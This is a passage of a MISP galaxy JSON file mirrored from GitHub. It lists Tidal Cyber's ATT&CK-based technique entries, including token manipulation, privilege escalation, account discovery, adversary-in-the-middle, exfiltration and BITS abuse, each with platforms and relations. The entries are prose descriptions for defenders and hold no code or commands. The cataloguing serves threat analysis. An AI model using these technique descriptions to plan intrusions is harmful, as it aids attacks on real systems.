mirror of
https://github.com/MISP/misp-galaxy.git
synced 2024-11-22 14:57:18 +00:00
4098 lines
416 KiB
JSON
{
|
||
"authors": [
|
||
"Tidal Cyber"
|
||
],
|
||
"category": "Technique",
|
||
"description": "Tidal Technique Cluster",
|
||
"name": "Tidal Technique",
|
||
"source": "https://app-api.tidalcyber.com/api/v1/technique/",
|
||
"type": "technique",
|
||
"uuid": "298b6aee-981b-4fd8-8759-a2e72ad223fa",
|
||
"values": [
|
||
{
|
||
"description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk.<sup>[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]</sup><sup>[[sudo man page 2018](https://app.tidalcyber.com/references/659d4302-d4cf-41af-8007-aa1da0208aa0)]</sup> An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.<sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup><sup>[[Fortinet Fareit](https://app.tidalcyber.com/references/d06223d7-2d86-41c6-af23-50865a1810c0)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ac7d9875-d18b-48f6-93e6-47c565f9526b",
|
||
"value": "Abuse Elevation Control Mechanism"
|
||
},
|
||
{
|
||
"description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7)) or used to spawn a new process (i.e. [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.<sup>[[Pentestlab Token Manipulation](https://app.tidalcyber.com/references/243deb44-4d47-4c41-bd5d-262c4319cce5)]</sup>\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041",
|
||
"value": "Access Token Manipulation"
|
||
},
|
||
{
|
||
"description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to set malicious changes into place.<sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup><sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>\n\nIn Windows, [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) objective. ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "847fcc8a-e74d-41e2-9f05-8d79d990cc04",
|
||
"value": "Account Access Removal"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists.<sup>[[AWS List Users](https://app.tidalcyber.com/references/517e3d27-36da-4810-b256-3f47147b36e3)]</sup><sup>[[Google Cloud - IAM Servie Accounts List API](https://app.tidalcyber.com/references/3ffad706-1dac-41dd-b197-06f22fec3b30)]</sup> On hosts, adversaries can use default [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and other command line functionality to identify accounts. Information about email addresses and accounts may also be extracted by searching an infected system’s files.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "6736995e-b9ea-401b-81fa-6caeb7a17ce3",
|
||
"value": "Account Discovery"
|
||
},
|
||
{
|
||
"description": "Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. Account manipulation may consist of any action that preserves or modifies adversary access to a compromised account, such as modifying credentials or permission groups.<sup>[[FireEye SMOKEDHAM June 2021](https://app.tidalcyber.com/references/a81ad3ef-fd96-432c-a7c8-ccc86d127a1b)]</sup> These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. \n\nIn order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. However, account manipulation may also lead to privilege escalation where modifications grant access to additional roles, permissions, or higher-privileged [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Azure AD",
|
||
"Containers",
|
||
"Google Workspace",
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Office 365",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "65f7482c-485b-4fd7-80f5-0ec6e923ac4d",
|
||
"value": "Account Manipulation"
|
||
},
|
||
{
|
||
"description": "Adversaries may purchase or otherwise acquire an existing access to a target system or network. A variety of online services and initial access broker networks are available to sell access to previously compromised systems.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup><sup>[[Krebs Access Brokers Fortune 500](https://app.tidalcyber.com/references/37d237ae-f0a8-5b30-8f97-d751c1560391)]</sup> In some cases, adversary groups may form partnerships to share compromised systems with each other.<sup>[[CISA Karakurt 2022](https://app.tidalcyber.com/references/5a9a79fa-532b-582b-9741-cb732803cd22)]</sup>\n\nFootholds to compromised systems may take a variety of forms, such as access to planted backdoors (e.g., [Web Shell](https://app.tidalcyber.com/technique/05a5318f-476d-44c1-8a85-9466295d31dd)) or established access via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4). In some cases, access brokers will implant compromised systems with a “load” that can be used to install additional malware for paying customers.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup>\n\nBy leveraging existing access broker networks rather than developing or obtaining their own initial access capabilities, an adversary can potentially reduce the resources required to gain a foothold on a target network and focus their efforts on later stages of compromise. 
Adversaries may prioritize acquiring access to systems that have been determined to lack security monitoring or that have high privileges, or systems that belong to organizations in a particular sector.<sup>[[Microsoft Ransomware as a Service](https://app.tidalcyber.com/references/833018b5-6ef6-5327-9af5-1a551df25cd2)]</sup><sup>[[CrowdStrike Access Brokers](https://app.tidalcyber.com/references/0f772693-e09d-5c82-85c2-77f5fee39ef0)]</sup>\n\nIn some cases, purchasing access to an organization in sectors such as IT contracting, software development, or telecommunications may allow an adversary to compromise additional victims via a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf), [Multi-Factor Authentication Interception](https://app.tidalcyber.com/technique/600d45ec-cb9c-47b8-ae94-326471ebb007), or even [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f).\n\n**Note:** while this technique is distinct from other behaviors such as [Purchase Technical Data](https://app.tidalcyber.com/technique/56ab198f-f8bb-4fe9-bd85-5975d4d3863b) and [Credentials](https://app.tidalcyber.com/technique/e5d9c785-61bd-483f-b2ac-5bd9a8641b22), they may often be used in conjunction (especially where the acquired foothold requires [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "478da817-1914-50f6-b1fd-434081a34354",
|
||
"value": "Acquire Access"
|
||
},
|
||
{
|
||
"description": "Adversaries may buy, lease, rent, or obtain infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.<sup>[[TrendmicroHideoutsLease](https://app.tidalcyber.com/references/527de869-3c76-447c-98c4-c37a2acf75e2)]</sup> Some infrastructure providers offer free trial periods, enabling infrastructure acquisition at limited to no cost.<sup>[[Free Trial PurpleUrchin](https://app.tidalcyber.com/references/841f397d-d103-56d7-9854-7ce43c684879)]</sup> Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b), including from residential proxy services.<sup>[[amnesty_nso_pegasus](https://app.tidalcyber.com/references/9e40d93a-fe91-504a-a6f2-e6546067ba53)]</sup><sup>[[FBI Proxies Credential Stuffing](https://app.tidalcyber.com/references/17f9b7b0-3e1a-5d75-9030-da79fcccdb49)]</sup><sup>[[Mandiant APT29 Microsoft 365 2022](https://app.tidalcyber.com/references/e141408e-d22b-58e4-884f-0cbff25444da)]</sup> Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "989d09c2-12b8-4419-9b34-a328cf295fff",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3",
|
||
"value": "Acquire Infrastructure"
|
||
},
|
||
{
|
||
"description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.<sup>[[Botnet Scan](https://app.tidalcyber.com/references/ca09941c-fcc8-460b-8b02-d1608a7d3813)]</sup><sup>[[OWASP Fingerprinting](https://app.tidalcyber.com/references/ec89a48b-3b00-4928-8450-d2fbd307817f)]</sup> Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).",
|
||
"meta": {
|
||
"platforms": [
|
||
"PRE"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "a930437d-5a12-4dc4-b311-f5fd6a766c85",
|
||
"value": "Active Scanning"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique to support follow-on behaviors such as [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243), or replay attacks ([Exploitation for Credential Access](https://app.tidalcyber.com/technique/afdfa503-0464-4b42-a79c-a6fc828492ef)). By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.<sup>[[Rapid7 MiTM Basics](https://app.tidalcyber.com/references/33b25966-0ab9-4cc6-9702-62263a23af9c)]</sup>\n\nFor example, adversaries may manipulate victim DNS settings to enable other malicious activities such as preventing/redirecting users from accessing legitimate sites and/or pushing additional malware.<sup>[[ttint_rat](https://app.tidalcyber.com/references/f3e60cae-3225-4800-bc15-cb46ff715061)]</sup><sup>[[dns_changer_trojans](https://app.tidalcyber.com/references/082a0fde-d9f9-45f2-915d-f14c77b62254)]</sup><sup>[[ad_blocker_with_miner](https://app.tidalcyber.com/references/8e30f71e-80b8-4662-bc95-bf3cf7cfcf40)]</sup> Adversaries may also manipulate DNS and leverage their position in order to intercept user credentials, including access tokens ([Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)) and session cookies ([Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)).<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup><sup>[[Token 
tactics](https://app.tidalcyber.com/references/e254e336-2e3e-5bea-a9e9-0f42f333b894)]</sup> [Downgrade Attack](https://app.tidalcyber.com/technique/257fffe4-d17b-4e63-a41c-8388936d6215)s can also be used to establish an AiTM position, such as by negotiating a less secure, deprecated, or weaker version of communication protocol (SSL/TLS) or encryption algorithm.<sup>[[mitm_tls_downgrade_att](https://app.tidalcyber.com/references/af907fe1-1e37-4f44-8ad4-fcc3826ee6fb)]</sup><sup>[[taxonomy_downgrade_att_tls](https://app.tidalcyber.com/references/4459076e-7c79-4855-9091-5aabd274f586)]</sup><sup>[[tlseminar_downgrade_att](https://app.tidalcyber.com/references/8b5d46bf-fb4e-4ecd-b8a9-9c084c1864a3)]</sup>\n\nAdversaries may also leverage the AiTM position to attempt to monitor and/or modify traffic, such as in [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243). Adversaries can setup a position similar to AiTM to prevent traffic from flowing to the appropriate destination, potentially to [Impair Defenses](https://app.tidalcyber.com/technique/e3be3d76-0a36-4060-8003-3b39c557f728) and/or in support of a [Network Denial of Service](https://app.tidalcyber.com/technique/e6c14a7b-1fb8-4557-83e7-7f5b89717311).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "d98dbf30-c454-42ff-a9f3-2cd3319cc0d9",
|
||
"value": "Adversary-in-the-Middle"
|
||
},
|
||
{
|
||
"description": "Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nAdversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.<sup>[[Mandiant APT29 Eye Spy Email Nov 22](https://app.tidalcyber.com/references/452ca091-42b1-5bef-8a01-921c1f46bbee)]</sup> ",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "8a7afe43-b814-41b3-8bd8-e1301b8ba5b4",
|
||
"value": "Application Layer Protocol"
|
||
},
|
||
{
|
||
"description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup> For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) to evade.<sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) commands and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "3b2f435a-8666-43b5-9883-f2808eebd726",
|
||
"value": "Application Window Discovery"
|
||
},
|
||
{
|
||
"description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network.<sup>[[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)]</sup> Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "ebd3f870-c513-4fb0-b133-15ffc1f91db2",
|
||
"value": "Archive Collected Data"
|
||
},
|
||
{
|
||
"description": "An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.<sup>[[ESET Attor Oct 2019](https://app.tidalcyber.com/references/fdd57c56-d989-4a6f-8cc5-5b3713605dec)]</sup>\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "2be5c67a-edae-4083-8b6d-f99eaa622ed4",
|
||
"value": "Audio Capture"
|
||
},
|
||
{
|
||
"description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. \n\nIn cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.<sup>[[Mandiant UNC3944 SMS Phishing 2023](https://app.tidalcyber.com/references/3a310dbd-4b5c-5eaf-a4ce-699e52007c9b)]</sup> \n\nThis functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) and [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f) to identify and move files, as well as [Cloud Service Dashboard](https://app.tidalcyber.com/technique/315ce434-ad6d-4dae-a1dd-6db944a44422) and [Cloud Storage Object Discovery](https://app.tidalcyber.com/technique/92761d92-a288-4407-a112-bb2720f07d07) to identify resources in cloud environments.",
|
||
"meta": {
|
||
"platforms": [
|
||
"IaaS",
|
||
"Linux",
|
||
"macOS",
|
||
"SaaS",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "107ad6c5-79b1-468c-9519-1578bee2ac49",
|
||
"value": "Automated Collection"
|
||
},
|
||
{
|
||
"description": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.<sup>[[ESET Gamaredon June 2020](https://app.tidalcyber.com/references/6532664d-2311-4b38-8960-f43762471729)]</sup> \n\nWhen automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) and [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).",
|
||
"meta": {
|
||
"platforms": [
|
||
"Linux",
|
||
"macOS",
|
||
"Network",
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "66249a6d-be4e-43ab-a295-349d03a98023",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "26abc19f-5968-45f1-aa1f-f35863a2f804",
|
||
"value": "Automated Exfiltration"
|
||
},
|
||
{
|
||
"description": "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup><sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup> BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.\n\nThe interface to create and manage BITS jobs is accessible through [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) and the [BITSAdmin](https://app.tidalcyber.com/software/52a20d3d-1edd-4f17-87f0-b77c67d260b4) tool.<sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup><sup>[[Microsoft BITSAdmin](https://app.tidalcyber.com/references/5b8c2a8c-f01e-491a-aaf9-504ee7a1caed)]</sup>\n\nAdversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://app.tidalcyber.com/technique/fa1507f1-c763-4af1-8bd9-a2fb8f7904be)). 
BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup><sup>[[Mondok Windows PiggyBack BITS May 2007](https://app.tidalcyber.com/references/7dd03a92-11b8-4b8a-9d34-082ecf09a6e4)]</sup><sup>[[Symantec BITS May 2007](https://app.tidalcyber.com/references/e5962c87-0d42-46c2-8757-91f264fc570f)]</sup> BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup><sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>\n\nBITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>",
|
||
"meta": {
|
||
"platforms": [
|
||
"Windows"
|
||
],
|
||
"source": "MITRE"
|
||
},
|
||
"related": [
|
||
{
|
||
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
|
||
"type": "uses"
|
||
},
|
||
{
|
||
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
|
||
"type": "uses"
|
||
}
|
||
],
|
||
"uuid": "6b278e5d-7383-42a4-9425-2da79bbe43e0",
|
||
"value": "BITS Jobs"
|
||
},
|
||
{
|
||
"description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup><sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup><sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup><sup>[[Cylance Reg Persistence Sept 2013](https://app.tidalcyber.com/references/9e9c745f-19fd-4218-b8dc-85df804ecb70)]</sup><sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.\n\nSince some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
